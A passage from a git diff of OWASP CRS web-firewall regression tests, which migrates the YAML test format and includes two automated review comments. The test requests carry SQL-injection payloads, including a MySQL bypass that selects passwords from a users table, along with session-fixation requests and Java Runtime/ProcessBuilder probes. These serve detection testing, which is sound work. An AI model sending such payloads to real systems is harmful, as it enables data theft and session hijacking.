"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 
'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb5d..34ab0f5a7 100644 
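Review bot: Every rewritten stage in this hunk keeps `version: HTTP/1.0` as an unquoted plain scalar, while the 942540 hunk just above quotes the same field (`version: "HTTP/1.1"`); since the patch already rewrites each of these lines, this is the moment to settle on one form, and the quoted form is the more defensive one for a protocol token the runner must send verbatim. The 942560 hunk that follows uses the same unquoted form, so whichever convention is chosen should be applied there as well. One further thing to verify: `test_title: 942550-N` becomes a bare `test_id: N` beside a single `rule_id: 942550`, so anything that still addresses these tests by the composite `942550-N` name depends on the runner recomposing it from the two fields — presumably it does, but it is worth checking against whatever consumes `rule_id`.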
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -2,40 +2,37 @@ meta: author: "Xhoenix, azurit" description: MySQL Scientific Notation bypass payloads Detection - enabled: true - name: 942560.yaml +rule_id: 942560 tests: - - test_title: 942560-1 + - test_id: 1 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" - version: HTTP/1.0 - output: - log_contains: id "942560" - - test_title: 942560-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log_contains: id "942560" + - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "foo=1.e(ascii)" - version: HTTP/1.0 - output: - log_contains: id "942560" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log_contains: id "942560" 
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 1713247d8..184b98ef0 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml 
@@ -2,48 +2,44 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943100.yaml tests: - - test_title: 943100-1 + - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get/foo.php?bar=blah' - version: HTTP/1.1 - output: - log_contains: id "943100" - - test_title: 943100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get/foo.php?bar=blah' + version: HTTP/1.1 + output: + log_contains: id "943100" + - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/foo.php?test=.cookie;expires=" - version: HTTP/1.1 - output: - log_contains: id "943100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: 
'300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/foo.php?test=.cookie;expires=" + version: HTTP/1.1 + output: + log_contains: id "943100" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 0802f4f46..f0d788032 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml 
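Review bot: The `meta` section here drops `enabled` and `name` but, unlike the 942560.yaml, 944000.yaml and 944100.yaml hunks in the same commit, does not add a top-level `rule_id: 943100`; the 943110.yaml and 943120.yaml hunks have the same omission. If the new runner associates a test file with its rule only through `rule_id`, these three files would lose that association, and their `test_id` values (`1`, `2`, …) are only unique within a rule. Adding `rule_id: 943100` (and `943110`, `943120` respectively) after `description: None` would make the files consistent with the rest of the migration; if the loader instead derives the id from the file name when the key is absent, a short comment in the file saying so would spare the next reader the same question.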
@@ -2,84 +2,78 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943110.yaml tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log_contains: id "943110" + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + 
Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + no_log_contains: id "943110" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814a3..ca4b42e14 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -2,26 +2,23 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943120.yaml tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log_contains: id "943120" 
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d272..89a8d1154 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + no_log_contains: "id \"944000\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 80705038d..ef283dc65 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml 
@@ -1,373 +1,354 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - 
version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: 
en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
